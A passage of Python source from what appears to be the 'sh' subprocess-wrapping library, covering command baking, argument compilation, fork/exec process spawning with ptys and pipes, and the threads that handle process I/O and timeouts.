can be a security # vulnerability "close_fds": True, # a whitelist of the integer fds to pass through to the child process. setting this forces close_fds to be True "pass_fds": set(), } # this is a collection of validators to make sure the special kwargs make # sense _kwarg_validators = ( (("err", "err_to_out"), "Stderr is already being redirected"), (("piped", "iter"), "You cannot iterate when this command is being piped"), (("piped", "no_pipe"), "Using a pipe doesn't make sense if you've disabled the pipe"), (("no_out", "iter"), "You cannot iterate over output if there is no output"), (("close_fds", "pass_fds"), "Passing `pass_fds` forces `close_fds` to be True"), tty_in_validator, bufsize_validator, env_validator, fg_validator, ) def __init__(self, path, search_paths=None): found = which(path, search_paths) self._path = encode_to_py3bytes_or_py2str("") # is the command baked (aka, partially applied)? self._partial = False self._partial_baked_args = [] self._partial_call_args = {} # bugfix for functools.wraps. issue #121 self.__name__ = str(self) if not found: raise CommandNotFound(path) # the reason why we set the values early in the constructor, and again # here, is for people who have tools that inspect the stack on # exception. if CommandNotFound is raised, we need self._path and the # other attributes to be set correctly, so repr() works when they're # inspecting the stack. issue #304 self._path = encode_to_py3bytes_or_py2str(found) self.__name__ = str(self) def __getattribute__(self, name): # convenience get_attr = partial(object.__getattribute__, self) val = None if name.startswith("_"): val = get_attr(name) elif name == "bake": val = get_attr("bake") # here we have a way of getting past shadowed subcommands. for example, # if "git bake" was a thing, we wouldn't be able to do `git.bake()` # because `.bake()` is already a method. so we allow `git.bake_()` elif name.endswith("_"): name = name[:-1] if val is None: val = get_attr("bake")(name) return val @staticmethod def _extract_call_args(kwargs): """ takes kwargs that were passed to a command's __call__ and extracts out the special keyword arguments, we return a tuple of special keyword args, and kwargs that will go to the exec'ed command """ kwargs = kwargs.copy() call_args = {} for parg, default in Command._call_args.items(): key = "_" + parg if key in kwargs: call_args[parg] = kwargs[key] del kwargs[key] merged_args = Command._call_args.copy() merged_args.update(call_args) invalid_kwargs = special_kwarg_validator(call_args, merged_args, Command._kwarg_validators) if invalid_kwargs: exc_msg = [] for kwarg, error_msg in invalid_kwargs: exc_msg.append(" %r: %s" % (kwarg, error_msg)) exc_msg = "\n".join(exc_msg) raise TypeError("Invalid special arguments:\n\n%s\n" % exc_msg) return call_args, kwargs # TODO needs documentation def bake(self, *args, **kwargs): fn = type(self)(self._path) fn._partial = True call_args, kwargs = self._extract_call_args(kwargs) pruned_call_args = call_args for k, v in Command._call_args.items(): try: if pruned_call_args[k] == v: del pruned_call_args[k] except KeyError: continue fn._partial_call_args.update(self._partial_call_args) fn._partial_call_args.update(pruned_call_args) fn._partial_baked_args.extend(self._partial_baked_args) sep = pruned_call_args.get("long_sep", self._call_args["long_sep"]) prefix = pruned_call_args.get("long_prefix", self._call_args["long_prefix"]) fn._partial_baked_args.extend(compile_args(args, kwargs, sep, prefix)) return fn def __str__(self): """ in python3, should return unicode. in python2, should return a string of bytes """ if IS_PY3: return self.__unicode__() else: return self.__unicode__().encode(DEFAULT_ENCODING) def __eq__(self, other): return str(self) == str(other) __hash__ = None # Avoid DeprecationWarning in Python < 3 def __repr__(self): """ in python3, should return unicode. in python2, should return a string of bytes """ return "<Command %r>" % str(self) def __unicode__(self): """ a magic method defined for python2. calling unicode() on a self will call this """ baked_args = " ".join(item.decode(DEFAULT_ENCODING) for item in self._partial_baked_args) if baked_args: baked_args = " " + baked_args return self._path.decode(DEFAULT_ENCODING) + baked_args def __enter__(self): self(_with=True) def __exit__(self, exc_type, exc_val, exc_tb): get_prepend_stack().pop() def __call__(self, *args, **kwargs): kwargs = kwargs.copy() args = list(args) # this will hold our final command, including arguments, that will be # exec'ed cmd = [] # this will hold a complete mapping of all our special keyword arguments # and their values call_args = Command._call_args.copy() # aggregate any 'with' contexts for prepend in get_prepend_stack(): pcall_args = prepend.call_args.copy() # don't pass the 'with' call arg pcall_args.pop("with", None) call_args.update(pcall_args) cmd.extend(prepend.cmd) cmd.append(self._path) # do we have an argument pre-processor? if so, run it. we need to do # this early, so that args, kwargs are accurate preprocessor = self._partial_call_args.get("arg_preprocess", None) if preprocessor: args, kwargs = preprocessor(args, kwargs) # here we extract the special kwargs and override any # special kwargs from the possibly baked command extracted_call_args, kwargs = self._extract_call_args(kwargs) call_args.update(self._partial_call_args) call_args.update(extracted_call_args) # handle a None. this is added back only to not break the api in the # 1.* version. TODO remove this in 2.0, as "ok_code", if specified, # should always be a definitive value or list of values, and None is # ambiguous if call_args["ok_code"] is None: call_args["ok_code"] = 0 if not getattr(call_args["ok_code"], "__iter__", None): call_args["ok_code"] = [call_args["ok_code"]] # check if we're piping via composition stdin = call_args["in"] if args: first_arg = args.pop(0) if isinstance(first_arg, RunningCommand): if first_arg.call_args["piped"]: stdin = first_arg.process else: stdin = first_arg.process._pipe_queue else: args.insert(0, first_arg) processed_args = compile_args(args, kwargs, call_args["long_sep"], call_args["long_prefix"]) # makes sure our arguments are broken up correctly split_args = self._partial_baked_args + processed_args final_args = split_args cmd.extend(final_args) # if we're running in foreground mode, we need to completely bypass # launching a RunningCommand and OProc and just do a spawn if call_args["fg"]: cwd = call_args["cwd"] or os.getcwd() with pushd(cwd): if call_args["env"] is None: exit_code = os.spawnv(os.P_WAIT, cmd[0], cmd) else: exit_code = os.spawnve(os.P_WAIT, cmd[0], cmd, call_args["env"]) exc_class = get_exc_exit_code_would_raise(exit_code, call_args["ok_code"], call_args["piped"]) if exc_class: if IS_PY3: ran = " ".join([arg.decode(DEFAULT_ENCODING, "ignore") for arg in cmd]) else: ran = " ".join(cmd) exc = exc_class(ran, b"", b"", call_args["truncate_exc"]) raise exc return None # stdout redirection stdout = call_args["out"] if output_redirect_is_filename(stdout): stdout = open(str(stdout), "wb") # stderr redirection stderr = call_args["err"] if output_redirect_is_filename(stderr): stderr = open(str(stderr), "wb") return RunningCommand(cmd, call_args, stdin, stdout, stderr) def compile_args(a, kwargs, sep, prefix): """ takes args and kwargs, as they were passed into the command instance being executed with __call__, and compose them into a flat list that will eventually be fed into exec. example: with this call: sh.ls("-l", "/tmp", color="never") this function receives args = ['-l', '/tmp'] kwargs = {'color': 'never'} and produces ['-l', '/tmp', '--color=never'] """ processed_args = [] encode = encode_to_py3bytes_or_py2str # aggregate positional args for arg in a: if isinstance(arg, (list, tuple)): if isinstance(arg, GlobResults) and not arg: arg = [arg.path] for sub_arg in arg: processed_args.append(encode(sub_arg)) elif isinstance(arg, dict): processed_args += aggregate_keywords(arg, sep, prefix, raw=True) # see https://github.com/amoffat/sh/issues/522 elif arg is None or arg is False: pass else: processed_args.append(encode(arg)) # aggregate the keyword arguments processed_args += aggregate_keywords(kwargs, sep, prefix) return processed_args def aggregate_keywords(keywords, sep, prefix, raw=False): """ take our keyword arguments, and a separator, and compose the list of flat long (and short) arguments. example {'color': 'never', 't': True, 'something': True} with sep '=' becomes ['--color=never', '-t', '--something'] the `raw` argument indicates whether or not we should leave the argument name alone, or whether we should replace "_" with "-". if we pass in a dictionary, like this: sh.command({"some_option": 12}) then `raw` gets set to True, because we want to leave the key as-is, to produce: ['--some_option=12'] but if we just use a command's kwargs, `raw` is False, which means this: sh.command(some_option=12) becomes: ['--some-option=12'] essentially, using kwargs is a convenience, but it lacks the ability to put a '-' in the name, so we do the replacement of '_' to '-' for you. but when you really don't want that to happen, you should use a dictionary instead with the exact names you want """ processed = [] encode = encode_to_py3bytes_or_py2str for k, v in keywords.items(): # we're passing a short arg as a kwarg, example: # cut(d="\t") if len(k) == 1: if v is not False: processed.append(encode("-" + k)) if v is not True: processed.append(encode(v)) # we're doing a long arg else: if not raw: k = k.replace("_", "-") if v is True: processed.append(encode(prefix + k)) elif v is False: pass elif sep is None or sep == " ": processed.append(encode(prefix + k)) processed.append(encode(v)) else: arg = encode("%s%s%s%s" % (prefix, k, sep, v)) processed.append(arg) return processed def _start_daemon_thread(fn, name, exc_queue, *a): def wrap(*rgs, **kwargs): try: fn(*rgs, **kwargs) except Exception as e: exc_queue.put(e) raise thread = threading.Thread(target=wrap, name=name, args=a) thread.daemon = True thread.start() return thread def setwinsize(fd, rows_cols): """ set the terminal size of a tty file descriptor. borrowed logic from pexpect.py """ rows, cols = rows_cols winsize = getattr(termios, 'TIOCSWINSZ', -2146929561) s = struct.pack('HHHH', rows, cols, 0, 0) fcntl.ioctl(fd, winsize, s) def construct_streamreader_callback(process, handler): """ here we're constructing a closure for our streamreader callback. this is used in the case that we pass a callback into _out or _err, meaning we want to our callback to handle each bit of output we construct the closure based on how many arguments it takes. the reason for this is to make it as easy as possible for people to use, without limiting them. a new user will assume the callback takes 1 argument (the data). as they get more advanced, they may want to terminate the process, or pass some stdin back, and will realize that they can pass a callback of more args """ # implied arg refers to the "self" that methods will pass in. we need to # account for this implied arg when figuring out what function the user # passed in based on number of args implied_arg = 0 partial_args = 0 handler_to_inspect = handler if isinstance(handler, partial): partial_args = len(handler.args) handler_to_inspect = handler.func if inspect.ismethod(handler_to_inspect): implied_arg = 1 num_args = get_num_args(handler_to_inspect) else: if inspect.isfunction(handler_to_inspect): num_args = get_num_args(handler_to_inspect) # is an object instance with __call__ method else: implied_arg = 1 num_args = get_num_args(handler_to_inspect.__call__) net_args = num_args - implied_arg - partial_args handler_args = () # just the chunk if net_args == 1: handler_args = () # chunk, stdin if net_args == 2: handler_args = (process.stdin,) # chunk, stdin, process elif net_args == 3: # notice we're only storing a weakref, to prevent cyclic references # (where the process holds a streamreader, and a streamreader holds a # handler-closure with a reference to the process handler_args = (process.stdin, weakref.ref(process)) def fn(chunk): # this is pretty ugly, but we're evaluating the process at call-time, # because it's a weakref a = handler_args if len(a) == 2: a = (handler_args[0], handler_args[1]()) return handler(chunk, *a) return fn def get_exc_exit_code_would_raise(exit_code, ok_codes, sigpipe_ok): exc = None success = exit_code in ok_codes bad_sig = -exit_code in SIGNALS_THAT_SHOULD_THROW_EXCEPTION # if this is a piped command, SIGPIPE must be ignored by us and not raise an # exception, since it's perfectly normal for the consumer of a process's # pipe to terminate early if sigpipe_ok and -exit_code == signal.SIGPIPE: bad_sig = False success = True if not success or bad_sig: exc = get_rc_exc(exit_code) return exc def handle_process_exit_code(exit_code): """ this should only ever be called once for each child process """ # if we exited from a signal, let our exit code reflect that if os.WIFSIGNALED(exit_code): exit_code = -os.WTERMSIG(exit_code) # otherwise just give us a normal exit code elif os.WIFEXITED(exit_code): exit_code = os.WEXITSTATUS(exit_code) else: raise RuntimeError("Unknown child exit status!") return exit_code def no_interrupt(syscall, *args, **kwargs): """ a helper for making system calls immune to EINTR """ ret = None while True: try: ret = syscall(*args, **kwargs) except OSError as e: if e.errno == errno.EINTR: continue else: raise else: break return ret class OProc(object): """ this class is instantiated by RunningCommand for a command to be exec'd. it handles all the nasty business involved with correctly setting up the input/output to the child process. it gets its name for subprocess.Popen (process open) but we're calling ours OProc (open process) """ _default_window_size = (24, 80) # used in redirecting STDOUT = -1 STDERR = -2 def __init__(self, command, parent_log, cmd, stdin, stdout, stderr, call_args, pipe, process_assign_lock): """ cmd is the full list of arguments that will be exec'd. it includes the program name and all its arguments. stdin, stdout, stderr are what the child will use for standard input/output/err. call_args is a mapping of all the special keyword arguments to apply to the child process. """ self.command = command self.call_args = call_args # convenience ca = self.call_args if ca["uid"] is not None: if os.getuid() != 0: raise RuntimeError("UID setting requires root privileges") target_uid = ca["uid"] pwrec = pwd.getpwuid(ca["uid"]) target_gid = pwrec.pw_gid else: target_uid, target_gid = None, None # I had issues with getting 'Input/Output error reading stdin' from dd, # until I set _tty_out=False if ca["piped"]: ca["tty_out"] = False self._stdin_process = None # if the objects that we are passing to the OProc happen to be a # file-like object that is a tty, for example `sys.stdin`, then, later # on in this constructor, we're going to skip out on setting up pipes # and pseudoterminals for those endpoints stdin_is_fd_based = ob_is_fd_based(stdin) stdout_is_fd_based = ob_is_fd_based(stdout) stderr_is_fd_based = ob_is_fd_based(stderr) tee_out = ca["tee"] in (True, "out") tee_err = ca["tee"] == "err" single_tty = ca["tty_in"] and ca["tty_out"] and ca["unify_ttys"] # this logic is a little convoluted, but basically this top-level # if/else is for consolidating input and output TTYs into a single # TTY. this is the only way some secure programs like ssh will # output correctly (is if stdout and stdin are both the same TTY) if single_tty: # master_fd, slave_fd = pty.openpty() # # Anything that is written on the master end is provided to the process on the slave end as though it was # input typed on a terminal. -"man 7 pty" # # later, in the child process, we're going to do this, so keep it in mind: # # os.dup2(self._stdin_child_fd, 0) # os.dup2(self._stdout_child_fd, 1) # os.dup2(self._stderr_child_fd, 2) self._stdin_parent_fd, self._stdin_child_fd = pty.openpty() # this makes our parent fds behave like a terminal. it says that the very same fd that we "type" to (for # stdin) is the same one that we see output printed to (for stdout) self._stdout_parent_fd = os.dup(self._stdin_parent_fd) # this line is what makes stdout and stdin attached to the same pty. in other words the process will write # to the same underlying fd as stdout as it uses to read from for stdin. this makes programs like ssh happy self._stdout_child_fd = os.dup(self._stdin_child_fd) self._stderr_parent_fd = os.dup(self._stdin_parent_fd) self._stderr_child_fd = os.dup(self._stdin_child_fd) # do not consolidate stdin and stdout. this is the most common use- # case else: # this check here is because we may be doing piping and so our stdin # might be an instance of OProc if isinstance(stdin, OProc) and stdin.call_args["piped"]: self._stdin_child_fd = stdin._pipe_fd self._stdin_parent_fd = None self._stdin_process = stdin elif stdin_is_fd_based: self._stdin_child_fd = os.dup(get_fileno(stdin)) self._stdin_parent_fd = None elif ca["tty_in"]: self._stdin_parent_fd, self._stdin_child_fd = pty.openpty() # tty_in=False is the default else: self._stdin_child_fd, self._stdin_parent_fd = os.pipe() if stdout_is_fd_based and not tee_out: self._stdout_child_fd = os.dup(get_fileno(stdout)) self._stdout_parent_fd = None # tty_out=True is the default elif ca["tty_out"]: self._stdout_parent_fd, self._stdout_child_fd = pty.openpty() else: self._stdout_parent_fd, self._stdout_child_fd = os.pipe() # unless STDERR is going to STDOUT, it ALWAYS needs to be a pipe, # and never a PTY. the reason for this is not totally clear to me, # but it has to do with the fact that if STDERR isn't set as the # CTTY (because STDOUT is), the STDERR buffer won't always flush # by the time the process exits, and the data will be lost. # i've only seen this on OSX. if stderr is OProc.STDOUT: # if stderr is going to stdout, but stdout is a tty or a pipe, # we should not specify a read_fd, because stdout is os.dup'ed # directly to the stdout fd (no pipe), and so stderr won't have # a slave end of a pipe either to dup if stdout_is_fd_based and not tee_out: self._stderr_parent_fd = None else: self._stderr_parent_fd = os.dup(self._stdout_parent_fd) self._stderr_child_fd = os.dup(self._stdout_child_fd) elif stderr_is_fd_based and not tee_err: self._stderr_child_fd = os.dup(get_fileno(stderr)) self._stderr_parent_fd = None else: self._stderr_parent_fd, self._stderr_child_fd = os.pipe() piped = ca["piped"] self._pipe_fd = None if piped: fd_to_use = self._stdout_parent_fd if piped == "err": fd_to_use = self._stderr_parent_fd self._pipe_fd = os.dup(fd_to_use) new_session = ca["new_session"] needs_ctty = ca["tty_in"] and new_session self.ctty = None if needs_ctty: self.ctty = os.ttyname(self._stdin_child_fd) gc_enabled = gc.isenabled() if gc_enabled: gc.disable() # for synchronizing session_pipe_read, session_pipe_write = os.pipe() exc_pipe_read, exc_pipe_write = os.pipe() # this pipe is for synchronizing with the child that the parent has # closed its in/out/err fds. this is a bug on OSX (but not linux), # where we can lose output sometimes, due to a race, if we do # os.close(self._stdout_child_fd) in the parent after the child starts # writing. if IS_MACOS: close_pipe_read, close_pipe_write = os.pipe() else: close_pipe_read, close_pipe_write = None, None # session id, group id, process id self.sid = None self.pgid = None self.pid = os.fork() # child if self.pid == 0: # pragma: no cover if IS_MACOS: os.read(close_pipe_read, 1) os.close(close_pipe_read) os.close(close_pipe_write) # this is critical # our exc_pipe_write must have CLOEXEC enabled. the reason for this is tricky: # if our child (the block we're in now), has an exception, we need to be able to write to exc_pipe_write, so # that when the parent does os.read(exc_pipe_read), it gets our traceback. however, os.read(exc_pipe_read) # in the parent blocks, so if our child *doesn't* have an exception, and doesn't close the writing end, it # hangs forever. not good! but obviously the child can't close the writing end until it knows it's not # going to have an exception, which is impossible to know because but what if os.execv has an exception? so # the answer is CLOEXEC, so that the writing end of the pipe gets closed upon successful exec, and the # parent reading the read end won't block (close breaks the block). flags = fcntl.fcntl(exc_pipe_write, fcntl.F_GETFD) flags |= fcntl.FD_CLOEXEC fcntl.fcntl(exc_pipe_write, fcntl.F_SETFD, flags) try: # ignoring SIGHUP lets us persist even after the parent process # exits. only ignore if we're backgrounded if ca["bg"] is True: signal.signal(signal.SIGHUP, signal.SIG_IGN) # python ignores SIGPIPE by default. we must make sure to put # this behavior back to the default for spawned processes, # otherwise SIGPIPE won't kill piped processes, which is what we # need, so that we can check the error code of the killed # process to see that SIGPIPE killed it signal.signal(signal.SIGPIPE, signal.SIG_DFL) # put our forked process in a new session? this will relinquish # any control of our inherited CTTY and also make our parent # process init if new_session: os.setsid() # if we're not going in a new session, we should go in a new # process group. this way, our process, and any children it # spawns, are alone, contained entirely in one group. if we # didn't do this, and didn't use a new session, then our exec'd # process *could* exist in the same group as our python process, # depending on how we launch the process (from a shell, or some # other way) else: os.setpgrp() sid = os.getsid(0) pgid = os.getpgid(0) payload = ("%d,%d" % (sid, pgid)).encode(DEFAULT_ENCODING) os.write(session_pipe_write, payload) if ca["tty_out"] and not stdout_is_fd_based and not single_tty: # set raw mode, so there isn't any weird translation of # newlines to \r\n and other oddities. we're not outputting # to a terminal anyways # # we HAVE to do this here, and not in the parent process, # because we have to guarantee that this is set before the # child process is run, and we can't do it twice. tty.setraw(self._stdout_child_fd) # if the parent-side fd for stdin exists, close it. the case # where it may not exist is if we're using piping if self._stdin_parent_fd: os.close(self._stdin_parent_fd) if self._stdout_parent_fd: os.close(self._stdout_parent_fd) if self._stderr_parent_fd: os.close(self._stderr_parent_fd) os.close(session_pipe_read) os.close(exc_pipe_read) cwd = ca["cwd"] if cwd: os.chdir(cwd) os.dup2(self._stdin_child_fd, 0) os.dup2(self._stdout_child_fd, 1) os.dup2(self._stderr_child_fd, 2) # set our controlling terminal, but only if we're using a tty # for stdin. it doesn't make sense to have a ctty otherwise if needs_ctty: tmp_fd = os.open(os.ttyname(0), os.O_RDWR) os.close(tmp_fd) if ca["tty_out"] and not stdout_is_fd_based: setwinsize(1, ca["tty_size"]) if ca["uid"] is not None: os.setgid(target_gid) os.setuid(target_uid) preexec_fn = ca["preexec_fn"] if callable(preexec_fn): preexec_fn() close_fds = ca["close_fds"] if ca["pass_fds"]: close_fds = True if close_fds: pass_fds = set((0, 1, 2, exc_pipe_write)) pass_fds.update(ca["pass_fds"]) # don't inherit file descriptors inherited_fds = os.listdir("/dev/fd") inherited_fds = set(int(fd) for fd in inherited_fds) - pass_fds for fd in inherited_fds: try: os.close(fd) except OSError: pass # actually execute the process if ca["env"] is None: os.execv(cmd[0], cmd) else: os.execve(cmd[0], cmd, ca["env"]) # we must ensure that we carefully exit the child process on # exception, otherwise the parent process code will be executed # twice on exception https://github.com/amoffat/sh/issues/202 # # if your parent process experiences an exit code 255, it is most # likely that an exception occurred between the fork of the child # and the exec. this should be reported. except: # noqa: E722 # some helpful debugging tb = traceback.format_exc().encode("utf8", "ignore") try: os.write(exc_pipe_write, tb) except Exception as e: # dump to stderr if we cannot save it to exc_pipe_write sys.stderr.write("\nFATAL SH ERROR: %s\n" % e) finally: os._exit(255) # parent else: if gc_enabled: gc.enable() os.close(self._stdin_child_fd) os.close(self._stdout_child_fd) os.close(self._stderr_child_fd) # tell our child process that we've closed our write_fds, so it is # ok to proceed towards exec. see the comment where this pipe is # opened, for why this is necessary if IS_MACOS: os.close(close_pipe_read) os.write(close_pipe_write, str(1).encode(DEFAULT_ENCODING)) os.close(close_pipe_write) os.close(exc_pipe_write) fork_exc = os.read(exc_pipe_read, 1024 ** 2) os.close(exc_pipe_read) if fork_exc: fork_exc = fork_exc.decode(DEFAULT_ENCODING) raise ForkException(fork_exc) os.close(session_pipe_write) sid, pgid = os.read(session_pipe_read, 1024).decode(DEFAULT_ENCODING).split(",") os.close(session_pipe_read) self.sid = int(sid) self.pgid = int(pgid) # used to determine what exception to raise. if our process was # killed via a timeout counter, we'll raise something different than # a SIGKILL exception self.timed_out = False self.started = time.time() self.cmd = cmd # exit code should only be manipulated from within self._wait_lock # to prevent race conditions self.exit_code = None self.stdin = stdin # this accounts for when _out is a callable that is passed stdin. in that case, if stdin is unspecified, we # must set it to a queue, so callbacks can put things on it if callable(ca["out"]) and self.stdin is None: self.stdin = Queue() # _pipe_queue is used internally to hand off stdout from one process # to another. by default, all stdout from a process gets dumped # into this pipe queue, to be consumed in real time (hence the # thread-safe Queue), or at a potentially later time self._pipe_queue = Queue() # this is used to prevent a race condition when we're waiting for # a process to end, and the OProc's internal threads are also checking # for the processes's end self._wait_lock = threading.Lock() # these are for aggregating the stdout and stderr. we use a deque # because we don't want to overflow self._stdout = deque(maxlen=ca["internal_bufsize"]) self._stderr = deque(maxlen=ca["internal_bufsize"]) if ca["tty_in"] and not stdin_is_fd_based: setwinsize(self._stdin_parent_fd, ca["tty_size"]) self.log = parent_log.get_child("process", repr(self)) self.log.debug("started process") # disable echoing, but only if it's a tty that we created ourselves if ca["tty_in"] and not stdin_is_fd_based: attr = termios.tcgetattr(self._stdin_parent_fd) attr[3] &= ~termios.ECHO termios.tcsetattr(self._stdin_parent_fd, termios.TCSANOW, attr) # this represents the connection from a Queue object (or whatever # we're using to feed STDIN) to the process's STDIN fd self._stdin_stream = None if self._stdin_parent_fd: log = self.log.get_child("streamwriter", "stdin") self._stdin_stream = StreamWriter(log, self._stdin_parent_fd, self.stdin, ca["in_bufsize"], ca["encoding"], ca["tty_in"]) stdout_pipe = None if pipe is OProc.STDOUT and not ca["no_pipe"]: stdout_pipe = self._pipe_queue # this represents the connection from a process's STDOUT fd to # wherever it has to go, sometimes a pipe Queue (that we will use # to pipe data to other processes), and also an internal deque # that we use to aggregate all the output save_stdout = not ca["no_out"] and (tee_out or stdout is None) pipe_out = ca["piped"] in ("out", True) pipe_err = ca["piped"] in ("err",) # if we're piping directly into another process's file descriptor, we # bypass reading from the stdout stream altogether, because we've # already hooked up this processes's stdout fd to the other # processes's stdin fd self._stdout_stream = None if not pipe_out and self._stdout_parent_fd: if callable(stdout): stdout = construct_streamreader_callback(self, stdout) self._stdout_stream = StreamReader( self.log.get_child("streamreader", "stdout"), self._stdout_parent_fd, stdout, self._stdout, ca["out_bufsize"], ca["encoding"], ca["decode_errors"], stdout_pipe, save_data=save_stdout ) elif self._stdout_parent_fd: os.close(self._stdout_parent_fd) # if stderr is going to one place (because it's grouped with stdout, # or we're dealing with a single tty), then we don't actually need a # stream reader for stderr, because we've already set one up for # stdout above self._stderr_stream = None if stderr is not OProc.STDOUT and not single_tty and not pipe_err and self._stderr_parent_fd: stderr_pipe = None if pipe is OProc.STDERR and not ca["no_pipe"]: stderr_pipe = self._pipe_queue save_stderr = not ca["no_err"] and (ca["tee"] in ("err",) or stderr is None) if callable(stderr): stderr = construct_streamreader_callback(self, stderr) self._stderr_stream = StreamReader( Logger("streamreader"), self._stderr_parent_fd, stderr, self._stderr, ca["err_bufsize"], ca["encoding"], ca["decode_errors"], stderr_pipe, save_data=save_stderr ) elif self._stderr_parent_fd: os.close(self._stderr_parent_fd) def timeout_fn(): self.timed_out = True self.signal(ca["timeout_signal"]) self._timeout_event = None self._timeout_timer = None if ca["timeout"]: self._timeout_event = threading.Event() self._timeout_timer = threading.Timer(ca["timeout"], self._timeout_event.set) self._timeout_timer.start() # this is for cases where we know that the RunningCommand that was # launched was not .wait()ed on to complete. in those unique cases, # we allow the thread that processes output to report exceptions in # that thread. it's important that we only allow reporting of the # exception, and nothing else (like the additional stuff that # RunningCommand.wait() does), because we want the exception to be # re-raised in the future, if we DO call .wait() handle_exit_code = None if not self.command._spawned_and_waited and ca["bg_exc"]: def fn(exit_code): with process_assign_lock: return self.command.handle_command_exit_code(exit_code) handle_exit_code = fn self._quit_threads = threading.Event() thread_name = "background thread for pid %d" % self.pid self._bg_thread_exc_queue = Queue(1) self._background_thread = _start_daemon_thread( background_thread, thread_name, self._bg_thread_exc_queue, timeout_fn, self._timeout_event, handle_exit_code, self.is_alive, self._quit_threads ) # start the main io threads. stdin thread is not needed if we are # connecting from another process's stdout pipe self._input_thread = None self._input_thread_exc_queue = Queue(1) if self._stdin_stream: close_before_term = not needs_ctty thread_name = "STDIN thread for pid %d" % self.pid self._input_thread = _start_daemon_thread( input_thread, thread_name, self._input_thread_exc_queue, self.log, self._stdin_stream, self.is_alive, self._quit_threads, close_before_term ) # this event is for cases where the subprocess that we launch # launches its OWN subprocess and os.dup's the stdout/stderr fds to that # new subprocess. in that case, stdout and stderr will never EOF, # so our output_thread will never finish and will hang. this event # prevents that hanging self._stop_output_event = threading.Event() self._output_thread_exc_queue = Queue(1) thread_name = "STDOUT/ERR thread for pid %d" % self.pid self._output_thread = _start_daemon_thread( output_thread, thread_name, self._output_thread_exc_queue, self.log, self._stdout_stream, self._stderr_stream, self._timeout_event, self.is_alive, self._quit_threads, self._stop_output_event ) def __repr__(self): return "<Process %d %r>" % (self.pid, self.cmd[:500]) # these next 3 properties are primary for tests @property def output_thread_exc(self): exc = None try: exc = self._output_thread_exc_queue.get(False) except Empty: pass return exc @property def input_thread_exc(self): exc = None try: exc = self._input_thread_exc_queue.get(False) except Empty: pass return exc @property def bg_thread_exc(self): exc = None try: exc = self._bg_thread_exc_queue.get(False) except Empty: pass return exc def change_in_bufsize(self, buf): self._stdin_stream.stream_bufferer.change_buffering(buf) def change_out_bufsize(self, buf): self._stdout_stream.stream_bufferer.change_buffering(buf) def change_err_bufsize(self, buf): self._stderr_stream.stream_bufferer.change_buffering(buf) @property def stdout(self): return "".encode(self.call_args["encoding"]).join(self._stdout) @property def stderr(self): return "".encode(self.call_args["encoding"]).join(self._stderr) def get_pgid(self): """ return the CURRENT group id of the process. this differs from self.pgid in that this reflects the current state of the process, where self.pgid is the group id at launch """ return os.getpgid(self.pid) def get_sid(self): """ return the CURRENT session id of the process. this differs from self.sid in that this reflects the current state of the process, where self.sid is the session id at launch """ return os.getsid(self.pid) def signal_group(self, sig): self.log.debug("sending signal %d to group", sig) os.killpg(self.get_pgid(), sig) def signal(self, sig): self.log.debug("sending signal %d", sig) os.kill(self.pid, sig) def kill_group(self): self.log.debug("killing group") self.signal_group(signal.SIGKILL) def kill(self): self.log.debug("killing") self.signal(signal.SIGKILL) def terminate(self): self.log.debug("terminating") self.signal(signal.SIGTERM) def is_alive(self): """ polls if our child process has completed, without blocking. this method has side-effects, such as setting our exit_code, if we happen to see our child exit while this is running """ if self.exit_code is not None: return False, self.exit_code # what we're doing here essentially is making sure that the main thread # (or another thread), isn't calling .wait() on the process. because # .wait() calls os.waitpid(self.pid, 0), we can't do an os.waitpid # here...because if we did, and the process exited while in this # thread, the main thread's os.waitpid(self.pid, 0) would raise OSError # (because the process ended in another thread). # # so essentially what we're doing is, using this lock, checking if # we're calling .wait(), and if we are, let .wait() get the exit code # and handle the status, otherwise let us do it. acquired = self._wait_lock.acquire(False) if not acquired: if self.exit_code is not None: return False, self.exit_code return True, self.exit_code try: # WNOHANG is just that...we're calling waitpid without hanging... # essentially polling the process. the return result is (0, 0) if # there's no process status, so we check that pid == self.pid below # in order to determine how to proceed pid, exit_code = no_interrupt(os.waitpid, self.pid, os.WNOHANG) if pid == self.pid: self.exit_code = handle_process_exit_code(exit_code) self._process_just_ended() return False, self.exit_code # no child process except OSError: return False, self.exit_code else: return True, self.exit_code finally: self._wait_lock.release() def _process_just_ended(self): if self._timeout_timer: self._timeout_timer.cancel() done_callback = self.call_args["done"] if done_callback: success = self.exit_code in self.call_args["ok_code"] done_callback(success, self.exit_code) # this can only be closed at the end of the process, because it might be # the CTTY, and closing it prematurely will send a SIGHUP. we also # don't want to close it if there's a self._stdin_stream, because that # is in charge of closing it also if self._stdin_parent_fd and not self._stdin_stream: os.close(self._stdin_parent_fd) def wait(self): """ waits for the process to complete, handles the exit code """ self.log.debug("acquiring wait lock to wait for completion") # using the lock in a with-context blocks, which is what we want if # we're running wait() with self._wait_lock: self.log.debug("got wait lock") witnessed_end = False if self.exit_code is None: self.log.debug("exit code not set, waiting on pid") pid, exit_code = no_interrupt(os.waitpid, self.pid, 0) # blocks self.exit_code = handle_process_exit_code(exit_code) witnessed_end = True else: self.log.debug("exit code already set (%d), no need to wait", self.exit_code) self._quit_threads.set() # we may not have a thread for stdin, if the pipe has been connected # via _piped="direct" if self._input_thread: self._input_thread.join() # wait, then signal to our output thread that the child process is # done, and we should have finished reading all the stdout/stderr # data that we can by now timer = threading.Timer(2.0, self._stop_output_event.set) timer.start() # wait for our stdout and stderr streamreaders to finish reading and # aggregating the process output self._output_thread.join() timer.cancel() self._background_thread.join() if witnessed_end: self._process_just_ended() return self.exit_code def input_thread(log, stdin, is_alive, quit_thread, close_before_term): """ this is run in a separate thread. it writes into our process's stdin (a streamwriter) and waits the process to end AND everything that can be written to be written """ closed = False alive = True poller = Poller() poller.register_write(stdin) while poller and alive: changed = poller.poll(1) for fd, events in changed: if events & (POLLER_EVENT_WRITE | POLLER_EVENT_HUP): log.debug("%r ready for more input", stdin) done = stdin.write() if done: poller.unregister(stdin) if close_before_term: stdin.close() closed = True alive, _ = is_alive() while alive: quit_thread.wait(1) alive, _ = is_alive() if not closed: stdin.close() def event_wait(ev, timeout=None): triggered = ev.wait(timeout) if IS_PY26: triggered = ev.is_set() return triggered def background_thread(timeout_fn, timeout_event, handle_exit_code, is_alive, quit_thread): """ handles the timeout logic """ # if there's a timeout event, loop if timeout_event: while not quit_thread.is_set(): timed_out = event_wait(timeout_event, 0.1) if timed_out: timeout_fn() break # handle_exit_code will be a function ONLY if our command was NOT waited on # as part of its spawning. in other words, it's probably a background # command # # this reports the exit code exception in our thread. it's purely for the # user's awareness, and cannot be caught or used in any way, so it's ok to # suppress this during the tests if handle_exit_code and not 